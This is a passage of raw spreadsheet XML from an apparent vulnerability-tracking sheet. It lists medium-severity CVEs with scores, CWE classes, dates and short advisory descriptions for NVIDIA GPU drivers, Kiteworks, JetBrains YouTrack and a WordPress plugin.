      <c r="M363" s="5" t="inlineStr"/>
      <c r="N363" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O363" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P363" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q363" s="5" t="inlineStr"/>
      <c r="R363" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S363" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer where an attacker could cause an out-of-bounds write. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T363" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47529</t>
        </is>
      </c>
    </row>
    <row r="364">
      <c r="A364" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B364" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C364" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47532</t>
        </is>
      </c>
      <c r="D364" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="E364" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F364" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G364" s="5" t="inlineStr"/>
      <c r="H364" s="5" t="inlineStr"/>
      <c r="I364" s="5" t="inlineStr"/>
      <c r="J364" s="5" t="inlineStr"/>
      <c r="K364" s="5" t="inlineStr"/>
      <c r="L364" s="5" t="inlineStr"/>
      <c r="M364" s="5" t="inlineStr"/>
      <c r="N364" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O364" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P364" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q364" s="5" t="inlineStr"/>
      <c r="R364" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S364"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364" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47532</t>
        </is>
      </c>
    </row>
    <row r="365">
      <c r="A365" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B365" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C365" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47533</t>
        </is>
      </c>
      <c r="D365" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="E365" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F365" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G365" s="5" t="inlineStr"/>
      <c r="H365" s="5" t="inlineStr"/>
      <c r="I365" s="5" t="inlineStr"/>
      <c r="J365" s="5" t="inlineStr"/>
      <c r="K365" s="5" t="inlineStr"/>
      <c r="L365" s="5" t="inlineStr"/>
      <c r="M365" s="5" t="inlineStr"/>
      <c r="N365" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O365" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P365" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q365" s="5" t="inlineStr"/>
      <c r="R365" s="5" t="inlineStr">
        <is>
          <t>CWE-129</t>
        </is>
      </c>
      <c r="S365" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer where an attacker could cause an improper validation of an array index. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T365" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47533</t>
        </is>
      </c>
    </row>
    <row r="366">
      <c r="A366" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B366" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C366" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47537</t>
        </is>
      </c>
      <c r="D366" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="E366" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F366" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G366" s="5" t="inlineStr"/>
      <c r="H366" s="5" t="inlineStr"/>
      <c r="I366" s="5" t="inlineStr"/>
      <c r="J366" s="5" t="inlineStr"/>
      <c r="K366" s="5" t="inlineStr"/>
      <c r="L366" s="5" t="inlineStr"/>
      <c r="M366" s="5" t="inlineStr"/>
      <c r="N366" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O366" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P366" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q366" s="5" t="inlineStr"/>
      <c r="R366" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S366" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer where an attacker could cause an out-of-bounds write. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T366" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47537</t>
        </is>
      </c>
    </row>
    <row r="367">
      <c r="A367" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B367" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C367" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47538</t>
        </is>
      </c>
      <c r="D367" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="E367" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F367" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G367" s="5" t="inlineStr"/>
      <c r="H367" s="5" t="inlineStr"/>
      <c r="I367" s="5" t="inlineStr"/>
      <c r="J367" s="5" t="inlineStr"/>
      <c r="K367" s="5" t="inlineStr"/>
      <c r="L367" s="5" t="inlineStr"/>
      <c r="M367" s="5" t="inlineStr"/>
      <c r="N367" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O367" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P367" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q367" s="5" t="inlineStr"/>
      <c r="R367" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S367" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the firmware where an attacker could cause an out-of-bounds write. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T367" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47538</t>
        </is>
      </c>
    </row>
    <row r="368">
      <c r="A368" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B368" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C368" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47539</t>
        </is>
      </c>
      <c r="D368" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="E368" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F368" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G368" s="5" t="inlineStr"/>
      <c r="H368" s="5" t="inlineStr"/>
      <c r="I368" s="5" t="inlineStr"/>
      <c r="J368" s="5" t="inlineStr"/>
      <c r="K368" s="5" t="inlineStr"/>
      <c r="L368" s="5" t="inlineStr"/>
      <c r="M368" s="5" t="inlineStr"/>
      <c r="N368" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O368" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P368" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q368" s="5" t="inlineStr"/>
      <c r="R368" s="5" t="inlineStr">
        <is>
          <t>CWE-681</t>
        </is>
      </c>
      <c r="S368" s="5" t="inlineStr">
        <is>
          <t>NVIDIA vGPU Virtual GPU Manager for Linux contains a vulnerability in the kernel mode layer where an attacker could cause an incorrect numeric conversion. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T368" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47539</t>
        </is>
      </c>
    </row>
    <row r="369">
      <c r="A369" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B369" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C369" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47542</t>
        </is>
      </c>
      <c r="D369" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="E369" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F369" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G369" s="5" t="inlineStr"/>
      <c r="H369" s="5" t="inlineStr"/>
      <c r="I369" s="5" t="inlineStr"/>
      <c r="J369" s="5" t="inlineStr"/>
      <c r="K369" s="5" t="inlineStr"/>
      <c r="L369" s="5" t="inlineStr"/>
      <c r="M369" s="5" t="inlineStr"/>
      <c r="N369" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O369" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P369" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q369" s="5" t="inlineStr"/>
      <c r="R369" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="S369" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer where an attacker could cause improper input validation. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T369" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47542</t>
        </is>
      </c>
    </row>
    <row r="370">
      <c r="A370" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B370" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C370" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47543</t>
        </is>
      </c>
      <c r="D370" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="E370" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F370" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G370" s="5" t="inlineStr"/>
      <c r="H370" s="5" t="inlineStr"/>
      <c r="I370" s="5" t="inlineStr"/>
      <c r="J370" s="5" t="inlineStr"/>
      <c r="K370" s="5" t="inlineStr"/>
      <c r="L370" s="5" t="inlineStr"/>
      <c r="M370" s="5" t="inlineStr"/>
      <c r="N370" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O370" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P370" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q370" s="5" t="inlineStr"/>
      <c r="R370" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="S370" s="5" t="inlineStr">
        <is>
          <t>VIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer where an attacker could cause improper input validation. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T370" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47543</t>
        </is>
      </c>
    </row>
    <row r="371">
      <c r="A371" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B371" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C371" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47544</t>
        </is>
      </c>
      <c r="D371" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="E371" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F371" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G371" s="5" t="inlineStr"/>
      <c r="H371" s="5" t="inlineStr"/>
      <c r="I371" s="5" t="inlineStr"/>
      <c r="J371" s="5" t="inlineStr"/>
      <c r="K371" s="5" t="inlineStr"/>
      <c r="L371" s="5" t="inlineStr"/>
      <c r="M371" s="5" t="inlineStr"/>
      <c r="N371" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O371" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P371" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q371" s="5" t="inlineStr"/>
      <c r="R371" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S371"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371" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47544</t>
        </is>
      </c>
    </row>
    <row r="372">
      <c r="A372" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B372" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C372" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47546</t>
        </is>
      </c>
      <c r="D372" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="E372" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F372" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G372" s="5" t="inlineStr"/>
      <c r="H372" s="5" t="inlineStr"/>
      <c r="I372" s="5" t="inlineStr"/>
      <c r="J372" s="5" t="inlineStr"/>
      <c r="K372" s="5" t="inlineStr"/>
      <c r="L372" s="5" t="inlineStr"/>
      <c r="M372" s="5" t="inlineStr"/>
      <c r="N372" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O372" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P372" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q372" s="5" t="inlineStr"/>
      <c r="R372" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="S372" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the firmware where an attacker could cause improper input validation. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T372" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47546</t>
        </is>
      </c>
    </row>
    <row r="373">
      <c r="A373" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B373" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C373" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47547</t>
        </is>
      </c>
      <c r="D373" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="E373" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F373" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G373" s="5" t="inlineStr"/>
      <c r="H373" s="5" t="inlineStr"/>
      <c r="I373" s="5" t="inlineStr"/>
      <c r="J373" s="5" t="inlineStr"/>
      <c r="K373" s="5" t="inlineStr"/>
      <c r="L373" s="5" t="inlineStr"/>
      <c r="M373" s="5" t="inlineStr"/>
      <c r="N373" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O373" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P373" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q373" s="5" t="inlineStr"/>
      <c r="R373" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="S373" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the firmware where an attacker could cause improper input validation. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T373" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47547</t>
        </is>
      </c>
    </row>
    <row r="374">
      <c r="A374" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B374" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C374" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102133</t>
        </is>
      </c>
      <c r="D374" s="5" t="n">
        <v>6.6</v>
      </c>
      <c r="E374" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F374" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G374" s="5" t="inlineStr"/>
      <c r="H374" s="5" t="inlineStr"/>
      <c r="I374" s="5" t="inlineStr"/>
      <c r="J374" s="5" t="inlineStr"/>
      <c r="K374" s="5" t="inlineStr"/>
      <c r="L374" s="5" t="inlineStr"/>
      <c r="M374" s="5" t="inlineStr"/>
      <c r="N374" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O374" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P374" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q374" s="5" t="inlineStr"/>
      <c r="R374" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="S374" s="5" t="inlineStr">
        <is>
          <t>An optional, separately licensed repository-connector feature in Kiteworks Core did not neutralize special characters in a user-supplied path before passing it to an external command. An authenticated system administrator could inject additional commands and write arbitrary content to files owned by the service account running the connector, enabling code execution in that account's context; exploitation additionally requires network egress from the appliance to a system under the attacker's control.</t>
        </is>
      </c>
      <c r="T374" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102133</t>
        </is>
      </c>
    </row>
    <row r="375">
      <c r="A375" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B375" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C375" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102135</t>
        </is>
      </c>
      <c r="D375" s="5" t="n">
        <v>6.6</v>
      </c>
      <c r="E375" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F375" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G375" s="5" t="inlineStr"/>
      <c r="H375" s="5" t="inlineStr"/>
      <c r="I375" s="5" t="inlineStr"/>
      <c r="J375" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K375" s="5" t="inlineStr"/>
      <c r="L375" s="5" t="inlineStr"/>
      <c r="M375" s="5" t="inlineStr"/>
      <c r="N375" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O375" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P375" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q375" s="5" t="inlineStr"/>
      <c r="R375" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S375" s="5" t="inlineStr">
        <is>
          <t>On a Kiteworks Email Protection Gateway cluster with database replication enabled, a party trusted by the cluster could submit a crafted serialized object that was deserialized without sufficient validation, potentially allowing code execution as the gateway service account. Replication is disabled by default, and exploitation requires control of a trusted cluster peer or administrative access to the appliance.</t>
        </is>
      </c>
      <c r="T375" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102135</t>
        </is>
      </c>
    </row>
    <row r="376">
      <c r="A376" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B376" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C376" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102145</t>
        </is>
      </c>
      <c r="D376" s="5" t="n">
        <v>6.6</v>
      </c>
      <c r="E376" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F376" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G376" s="5" t="inlineStr"/>
      <c r="H376" s="5" t="inlineStr"/>
      <c r="I376" s="5" t="inlineStr"/>
      <c r="J376" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K376" s="5" t="inlineStr"/>
      <c r="L376" s="5" t="inlineStr"/>
      <c r="M376" s="5" t="inlineStr"/>
      <c r="N376" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O376" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P376" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q376" s="5" t="inlineStr"/>
      <c r="R376" s="5" t="inlineStr">
        <is>
          <t>CWE-93</t>
        </is>
      </c>
      <c r="S376" s="5" t="inlineStr">
        <is>
          <t>An authenticated administrator could cause the server to issue requests to, and interact with, internal network services that are not meant to be reachable through this interface. On its own this did not result in code execution.</t>
        </is>
      </c>
      <c r="T376" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102145</t>
        </is>
      </c>
    </row>
    <row r="377">
      <c r="A377" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B377" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C377" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100274</t>
        </is>
      </c>
      <c r="D377" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E377" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F377" s="5" t="inlineStr">
        <is>
          <t>cve@jetbrains.com</t>
        </is>
      </c>
      <c r="G377" s="5" t="inlineStr"/>
      <c r="H377" s="5" t="inlineStr"/>
      <c r="I377" s="5" t="inlineStr"/>
      <c r="J377" s="5" t="inlineStr"/>
      <c r="K377" s="5" t="inlineStr"/>
      <c r="L377" s="5" t="inlineStr"/>
      <c r="M377" s="5" t="inlineStr"/>
      <c r="N377" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O377" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P377" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q377" s="5" t="inlineStr"/>
      <c r="R377" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S377" s="5" t="inlineStr">
        <is>
          <t>In JetBrains YouTrack before 2026.2.19197 project Admin could trigger DoS via a notification template</t>
        </is>
      </c>
      <c r="T377" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100274</t>
        </is>
      </c>
    </row>
    <row r="378">
      <c r="A378" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B378" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C378" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100279</t>
        </is>
      </c>
      <c r="D378" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E378" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F378" s="5" t="inlineStr">
        <is>
          <t>cve@jetbrains.com</t>
        </is>
      </c>
      <c r="G378" s="5" t="inlineStr"/>
      <c r="H378" s="5" t="inlineStr"/>
      <c r="I378" s="5" t="inlineStr"/>
      <c r="J378" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K378" s="5" t="inlineStr"/>
      <c r="L378" s="5" t="inlineStr"/>
      <c r="M378" s="5" t="inlineStr"/>
      <c r="N378" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O378" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P378" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q378" s="5" t="inlineStr"/>
      <c r="R378" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S378" s="5" t="inlineStr">
        <is>
          <t>In JetBrains YouTrack before 2026.2.19197 changing an integration URL exposed its stored credentials</t>
        </is>
      </c>
      <c r="T378" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100279</t>
        </is>
      </c>
    </row>
    <row r="379">
      <c r="A379" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B379" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C379" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100513</t>
        </is>
      </c>
      <c r="D379" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E379" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F379" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G379" s="5" t="inlineStr"/>
      <c r="H379" s="5" t="inlineStr"/>
      <c r="I379" s="5" t="inlineStr"/>
      <c r="J379" s="5" t="inlineStr"/>
      <c r="K379" s="5" t="inlineStr"/>
      <c r="L379" s="5" t="inlineStr"/>
      <c r="M379" s="5" t="inlineStr"/>
      <c r="N379" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O379" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P379" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q379" s="5" t="inlineStr"/>
      <c r="R379" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S379" s="5" t="inlineStr">
        <is>
          <t>Contributor Cross Site Scripting (XSS) in CF7 Views &amp;#8211; Complete Entry Management for Contact Form 7 &lt;= 3.2.5 versions.</t>
        </is>
      </c>
      <c r="T379" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100513</t>
        </is>
      </c>
    </row>
    <row r="380">
      <c r="A380" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B380" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C380" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101879</t>
        </is>
      </c>
      <c r="D380" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E380" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F380" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G380" s="5" t="inlineStr"/>
      <c r="H380" s="5" t="inlineStr"/>
      <c r="I380" s="5" t="inlineStr"/>
      <c r="J380" s="5" t="inlineStr"/>
      <c r="K380" s="5" t="inlineStr"/>
      <c r="L380" s="5" t="inlineStr"/>
      <c r="M380" s="5" t="inlineStr"/>
      <c r="N380" s="5" t="inlineStr">
